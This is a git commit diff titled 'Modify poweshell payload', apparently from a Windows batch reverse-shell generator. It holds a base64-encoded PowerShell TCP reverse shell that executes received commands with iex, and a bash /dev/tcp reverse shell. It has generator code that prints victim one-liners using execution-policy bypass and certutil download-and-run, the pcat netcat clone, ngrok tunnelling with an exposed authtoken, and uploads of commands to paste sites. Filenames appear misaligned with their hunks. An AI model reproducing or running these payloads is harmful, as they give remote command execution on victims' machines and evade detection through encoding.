Modify poweshell payload

Author: FlyfishSec

include/ngrok.exe

@@ -1 +1,3 @@
 authtoken: 1pqNPomgd8IS4MEVD5ixWqbynci_7qPUV8PQ9bZhDhR23gvBq
+web_addr: 44480
+region: ap

include/ngrok.yml

@@ -21,103 +21,8 @@ function pcat
     [alias("Help")][switch]$h=$False
   )
 
-  ############### HELP ###############
-  $Help = "
-pcat - Netcat, The Powershell Version
-Github Repository: https://github.com/besimorhino/pcat
-
-This script attempts to implement the features of netcat in a powershell
-script. It also contains extra features such as built-in relays, execute
-powershell, and a dnscat2 client.
-
-Usage: pcat [-c or -l] [-p port] [options]
-
-  -c  <ip>        Client Mode. Provide the IP of the system you wish to connect to.
-                  If you are using -dns, specify the DNS Server to send queries to.
-            
-  -l              Listen Mode. Start a listener on the port specified by -p.
-  
-  -p  <port>      Port. The port to connect to, or the port to listen on.
-  
-  -e  <proc>      Execute. Specify the name of the process to start.
-  
-  -ep             Execute Powershell. Start a pseudo powershell session. You can
-                  declare variables and execute commands, but if you try to enter
-                  another shell (nslookup, netsh, cmd, etc.) the shell will hang.
-            
-  -r  <str>       Relay. Used for relaying network traffic between two nodes.
-                  Client Relay Format:   -r <protocol>:<ip addr>:<port>
-                  Listener Relay Format: -r <protocol>:<port>
-                  DNSCat2 Relay Format:  -r dns:<dns server>:<dns port>:<domain>
-            
-  -u              UDP Mode. Send traffic over UDP. Because it's UDP, the client
-                  must send data before the server can respond.
-            
-  -dns  <domain>  DNS Mode. Send traffic over the dnscat2 dns covert channel.
-                  Specify the dns server to -c, the dns port to -p, and specify the 
-                  domain to this option, -dns. This is only a client.
-                  Get the server here: https://github.com/iagox86/dnscat2
-            
-  -dnsft <int>    DNS Failure Threshold. This is how many bad packets the client can
-                  recieve before exiting. Set to zero when receiving files, and set high
-                  for more stability over the internet.
-            
-  -t  <int>       Timeout. The number of seconds to wait before giving up on listening or
-                  connecting. Default: 60
-            
-  -i  <input>     Input. Provide data to be sent down the pipe as soon as a connection is
-                  established. Used for moving files. You can provide the path to a file,
-                  a byte array object, or a string. You can also pipe any of those into
-                  pcat, like 'aaaaaa' | pcat -c 10.1.1.1 -p 80
-            
-  -o  <type>      Output. Specify how pcat should return information to the console.
-                  Valid options are 'Bytes', 'String', or 'Host'. Default is 'Host'.
-            
-  -of <path>      Output File.  Specify the path to a file to write output to.
-            
-  -d              Disconnect. pcat will disconnect after the connection is established
-                  and the input from -i is sent. Used for scanning.
-            
-  -rep            Repeater. pcat will continually restart after it is disconnected.
-                  Used for setting up a persistent server.
-                  
-  -g              Generate Payload.  Returns a script as a string which will execute the
-                  pcat with the options you have specified. -i, -d, and -rep will not
-                  be incorporated.
-                  
-  -ge             Generate Encoded Payload. Does the same as -g, but returns a string which
-                  can be executed in this way: powershell -E <encoded string>
-
-  -h              Print this help message.
 
-Examples:
-
-  Listen on port 8000 and print the output to the console.
-      pcat -l -p 8000
-  
-  Connect to 10.1.1.1 port 443, send a shell, and enable verbosity.
-      pcat -c 10.1.1.1 -p 443 -e cmd -v
-  
-  Connect to the dnscat2 server on c2.example.com, and send dns queries
-  to the dns server on 10.1.1.1 port 53.
-      pcat -c 10.1.1.1 -p 53 -dns c2.example.com
-  
-  Send a file to 10.1.1.15 port 8000.
-      pcat -c 10.1.1.15 -p 8000 -i C:\inputfile
-  
-  Write the data sent to the local listener on port 4444 to C:\outfile
-      pcat -l -p 4444 -of C:\outfile
-  
-  Listen on port 8000 and repeatedly server a powershell shell.
-      pcat -l -p 8000 -ep -rep
-  
-  Relay traffic coming in on port 8000 over tcp to port 9000 on 10.1.1.1 over tcp.
-      pcat -l -p 8000 -r tcp:10.1.1.1:9000
-      
-  Relay traffic coming in on port 8000 over tcp to the dnscat2 server on c2.example.com,
-  sending queries to 10.1.1.1 port 53.
-      pcat -l -p 8000 -r dns:10.1.1.1:53:c2.example.com
-"
+  #$Help = 
   if($h){return $Help}
   ############### HELP ###############
 

include/pcat.ps1

@@ -1 +1 @@
-L2Jpbi9iYXNoIC1pPiYvZGV2L3RjcC8xOTIuMTY4LjEuMS84ODg4IDA+JjE=&powershell -EP Bypass -NoLogo -NonI -NoP -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAuADEAOgA4ADAALwBwAGMAYQB0AC4AcABzADEAJwApADsAcABjAGEAdAAgAC0AYwAgADEAOQAyAC4AMQA2ADgALgAxAC4AMQAgAC0AcAAgADgAOAA4ADgAIAAtAGUAIABjAG0AZAA=
+L2Jpbi9iYXNoIC1pPiYvZGV2L3RjcC8xMjcuMC4wLjEvOTk5OSAwPiYx&powershell -EP Bypass -NoLogo -NonI -NoP -Enc JABjAHQAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQAyADcALgAwAC4AMAAuADEAJwAsADkAOQA5ADkAKQA7ACQAcwB0AD0AJABjAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHQAPQAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAPQAkAHMAdAAuAFIAZQBhAGQAKAAkAGIAdAAsACAAMAAsACAAJABiAHQALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhAD0AKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB0ACwAMAAsACAAJABpACkAOwAkAHMAYgA9ACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxAHwATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAYgAyACAAPQAkAHMAYgArACgAcAB3AGQAKQAuAFAAYQB0AGgAKwAnAD4AJwA7ACQAcwBkAD0AKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAYgAyACkAOwAkAHMAdAAuAFcAcgBpAHQAZQAoACQAcwBkACwAMAAsACQAcwBkAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAHQALgBDAGwAbwBzAGUAKAApAA==

include/www/i

@@ -0,0 +1 @@
+$ct=New-Object System.Net.Sockets.TCPClient(''

payload/powershell_listener_1.payload

@@ -0,0 +1 @@
+);$st=$ct.GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$st.Read($bt, 0, $bt.Length)) -ne 0){;$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bt,0, $i);$sb=(iex $data 2>&1|Out-String );$sb2 =$sb+(pwd).Path+''>'';$sd=([text.encoding]::ASCII).GetBytes($sb2);$st.Write($sd,0,$sd.Length);$st.Flush()};$ct.Close()

payload/powershell_listener_2.payload

@@ -191,14 +191,17 @@ if "%~1" equ "" (
 
             ) else (
                 if not "%2"=="-ngrok" (
+                    echo ok
                     if not "%2"=="-pgrok" (
                         if "!rs_os_flag!"=="W10" (
+                            call :rs_banner_w10_start
                             echo  + Host:Port ^<==^> %~1:%~2
                             call :rs_info_w10windows_start
                             call :rs_windows_command_raw_start %~1 %~2
                             call :rs_info_w10linux_start
                             call :rs_linux_command_raw_start %~1 %~2
                         ) else (
+                            call :rs_banner_w7_start
                             echo  + Host:Port ^<==^> %~1:%~2
                             call :rs_info_w7windows_start
                             call :rs_windows_command_raw_start %~1 %~2
@@ -277,6 +280,7 @@ for /f %%i in ('findstr /b /c:"-" /v "%temp%\rs_temp_output.rsg"') do (
 :rs_clean_tempfile_start
 if exist "%temp%\rs_temp_input.rsg" del /q %temp%\rs_temp_input.rsg
 if exist "%temp%\rs_temp_output.rsg" del /q %temp%\rs_temp_output.rsg
+if exist "%temp%\powershell_listener.tmp" del /q %temp%\powershell_listener.tmp
 goto :eof
 :rs_clean_tempfile_end
 
@@ -291,7 +295,6 @@ if exist "%cd%\include\pcat.ps1" (
     powershell -c write-host "' - Unable to start listening,Missing file %cd%\include\pcat.ps1.'" -f red -n 2>nul
     goto rs_help_start
 )
-
 goto :eof
 :rs_local_listen_end
 
@@ -305,14 +308,14 @@ if exist "%cd%\include\ngrok.exe" (
     set rs_n=0
     FOR /L %%i in (1,1,30) do (
         set /a rs_n=!rs_n!+1
-        %cd%\include\curl.exe -s --retry 3 --retry-delay 5 --retry-connrefused http://localhost:4040/api/tunnels|find /i "ngrok.io" >nul&&set rs_ngrok=0
+        %cd%\include\curl.exe -s --retry 3 --retry-delay 5 --retry-connrefused http://localhost:44480/api/tunnels|find /i "ngrok.io" >nul&&set rs_ngrok=0
         if !rs_ngrok! == 0 goto :rs_ngrok_host
     )
 
     :rs_ngrok_host
     if !rs_ngrok! == 0 (    
-        FOR /F "tokens=9 delims==://" %%i in ('%cd%\include\curl.exe -s --retry 3 --retry-delay 5 --retry-connrefused http://localhost:4040/api/tunnels') do (set rs_ngrok_host=%%i)
-        FOR /F tokens^=11^ delims^=^:^,^" %%i in ('%cd%\include\curl.exe -s --retry 3 --retry-delay 5 --retry-connrefused http://localhost:4040/api/tunnels') do (set rs_ngrok_port=%%i)
+        FOR /F "tokens=9 delims==://" %%i in ('%cd%\include\curl.exe -s --retry 3 --retry-delay 5 --retry-connrefused http://localhost:44480/api/tunnels') do (set rs_ngrok_host=%%i)
+        FOR /F tokens^=11^ delims^=^:^,^" %%i in ('%cd%\include\curl.exe -s --retry 3 --retry-delay 5 --retry-connrefused http://localhost:44480/api/tunnels') do (set rs_ngrok_port=%%i)
 
         set rs_listen_host=
         set rs_listen_host=!rs_ngrok_host!
@@ -372,15 +375,33 @@ set rs_listen_host=
 set rs_listen_port=
 set rs_listen_host=%1
 set rs_listen_port=%2
+call :rs_powershell_listener_payload_start !rs_listen_host! !rs_listen_port!
 if "!rs_os_flag!"=="W10" (
-    echo  [92m  powershell -Ep Bypass -NoLogo -NonI -NoP -c IEX^(New-Object System.Net.Webclient^).DownloadString^('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'^);powercat -c !rs_listen_host! -p !rs_listen_port! -e cmd[0m
+    echo  [92m  powershell -EP Bypass -NoLogo -NonI -NoP -Enc !powershell_listener_payload![0m
     echo,
 ) else (
-    echo    powershell -Ep Bypass -NoLogo -NonI -NoP -c IEX^(New-Object System.Net.Webclient^).DownloadString^('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'^);powercat -c !rs_listen_host! -p !rs_listen_port! -e cmd
+    echo    powershell -EP Bypass -NoLogo -NonI -NoP -Enc '!powershell_listener_payload!'
 )
 goto :eof
 :rs_windows_command_raw_end
 
+::rs_powershell_listener_payload_start
+:rs_powershell_listener_payload_start
+set powershell_listener_payload=
+set rs_powershell_listener_payload_pre=
+set rs_powershell_listener_payload_suf=
+set /p rs_powershell_listener_payload_pre=<%cd%\payload\powershell_listener_1.payload
+set /p rs_powershell_listener_payload_suf=<%cd%\payload\powershell_listener_2.payload
+set powershell_listener_payload=!rs_powershell_listener_payload_pre!!rs_listen_host!'',!rs_listen_port!!rs_powershell_listener_payload_suf!
+powershell -c "[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('!powershell_listener_payload!'))|out-file -Encoding ascii %temp%\powershell_listener.tmp"
+::echo !powershell_listener_payload!
+::type %temp%\powershell_listener.tmp
+::set /p powershell_listener_payload=<%temp%\powershell_listener.tmp
+for /f "delims= tokens=1,2" %%i in (%temp%\powershell_listener.tmp) do set powershell_listener_payload=%%i
+::echo !powershell_listener_payload!
+goto :eof
+::rs_powershell_listener_payload_end
+
 :rs_linux_command_raw_start
 set rs_listen_host=
 set rs_listen_port=
@@ -434,25 +455,34 @@ if exist "%cd%\include\mongoose.exe" (
 ) else (
     powershell -c write-host "' - Missing file `"%cd%\include\mongoose.exe`",The web service failed to start`,the LAN mode needs to start the web service locally`,so the command will not be executed effectively'" -f red -n 2>nul
 )
+
+set rs_ps_command_pre_lan=
+set ps_command_suf_raw_lan=
+set linux_command_raw_lan=
+set rs_ps_command_suf_b64_lan=
+set rs_command_b64_lan=
+
+call :rs_powershell_listener_payload_start
+set rs_ps_command_b64=!powershell_listener_payload!
+::echo !rs_ps_command_b64!
+
 set "rs_ps_command_pre_lan=&powershell -EP Bypass -NoLogo -NonI -NoP -Enc "
-set "ps_command_suf_raw_lan=IEX (New-Object System.Net.Webclient).DownloadString(''http://%rs_listen_host%:%rs_webport%/pcat.ps1'');pcat -c !rs_listen_host! -p !rs_listen_port! -e cmd"
 set "linux_command_raw_lan=/bin/bash -i>&/dev/tcp/!rs_listen_host!/!rs_listen_port! 0>&1"
 call :rs_base64_encode_start "!linux_command_raw_lan!"
 set rs_linux_command_b64_lan=%rsgen_b64_res%
-powershell -c "[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('%ps_command_suf_raw_lan%'))|out-file -Encoding ascii %temp%\rs_temp_input.rsg"
-set /p rs_ps_command_suf_b64_lan=<%temp%\rs_temp_input.rsg
-set "rs_command_b64_lan=!rs_linux_command_b64_lan!!rs_ps_command_pre_lan!!rs_ps_command_suf_b64_lan!"
+set "rs_command_b64_lan=!rs_linux_command_b64_lan!!rs_ps_command_pre_lan!!rs_ps_command_b64!"
 echo !rs_command_b64_lan!>%cd%\include\www\i
 call :rs_http_post_start "!rs_listen_host!" "%temp%\rs_temp_output.rsg"
 set /p rs_ip2dec=<%temp%\rs_temp_output.rsg
+
 if "!rs_os_flag!"=="W10" (
     if "!rs_webport!" equ "80" (
         set rs_webport_display=
     ) else (
         set "rs_webport_display=:%rs_webport%"
     )
     call :rs_info_w10windows_start
-    echo  [92m  powershell -Ep Bypass -NoLogo -NonI -NoP -c IEX^(New-Object System.Net.Webclient^).DownloadString^('http://!rs_listen_host!!rs_webport_display!/pcat.ps1'^);pcat -c !rs_listen_host! -p !rs_listen_port! -e cmd[0m
+    echo  [92m  powershell -EP Bypass -NoLogo -NonI -NoP -Enc !powershell_listener_payload![0m
     echo,
     echo    certutil -urlcache -split -f http://!rs_listen_host!!rs_webport_display!/i cd.bat^|cd.bat
     echo,
@@ -483,7 +513,7 @@ if "!rs_os_flag!"=="W10" (
         set "rs_webport_display=:%rs_webport%"
     )
     call :rs_info_w7windows_start
-    echo    powershell -Ep Bypass -NoLogo -NonI -NoP -c IEX^(New-Object System.Net.Webclient^).DownloadString^('http://!rs_listen_host!!rs_webport_display!/pcat.ps1'^);pcat -c !rs_listen_host! -p !rs_listen_port! -e cmd
+    echo    powershell -EP Bypass -NoLogo -NonI -NoP -Enc !powershell_listener_payload!
     echo,
     echo    certutil -urlcache -split -f http://!rs_listen_host!!rs_webport_display!/i cd.bat^|cd.bat
     echo,
@@ -587,19 +617,21 @@ goto :eof
 :rs_command_generate_pub_start
 set rs_listen_host=
 set rs_listen_port=
+set rs_ps_command_suf_b64=
+set rs_linux_command_b64=
+set rs_command_b64=
 set rs_listen_host=%1
 set rs_listen_port=%2
 set "rs_ps_command_pre=&powershell -EP Bypass -NoLogo -NonI -NoP -Enc "
-set "ps_command_suf_raw=IEX (New-Object System.Net.Webclient).DownloadString(''https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'');powercat -c !rs_listen_host! -p !rs_listen_port! -e cmd"
+call :rs_powershell_listener_payload_start
 set "linux_command_raw=/bin/bash -i>&/dev/tcp/!rs_listen_host!/!rs_listen_port! 0>&1"
 call :rs_base64_encode_start "!linux_command_raw!"
 set rs_linux_command_b64=%rsgen_b64_res%
 ::echo %rs_linux_command_b64%
-powershell -c "[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('%ps_command_suf_raw%'))|out-file -Encoding ascii %temp%\rs_temp_input.rsg"
-set /p rs_ps_command_suf_b64=<%temp%\rs_temp_input.rsg
+set rs_ps_command_suf_b64=!powershell_listener_payload!
 ::echo %rs_ps_command_suf_b64%
 set "rs_command_b64=!rs_linux_command_b64!!rs_ps_command_pre!!rs_ps_command_suf_b64!"
-::echo !rs_command_b64!>%temp%\rs_command_b64.rsg
+::echo !rs_command_b64!
 call :rs_command_upload_start
 if "!rs_pastebin_status!"=="-1" (
     if "!rs_dpaste_status!"=="-1" (
@@ -653,7 +685,9 @@ var xhr = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
 var AdoDBObj = new ActiveXObject("ADODB.Stream");
 if (args.Length == 6 ) {
     url = args.Item(1)
-    data = args.Item(2).replace("+", "%2B").replace("&", "%26");
+    data = args.Item(2).replace("+","%2B").replace("&","%26").replace("+","%2B").replace("+","%2B").replace("+","%2B");
+    //WScript.Echo(data)
+    //WScript.Quit(666);
     filename = args.Item(3)
     ip = args.Item(4)
     ipfilename = args.Item(5)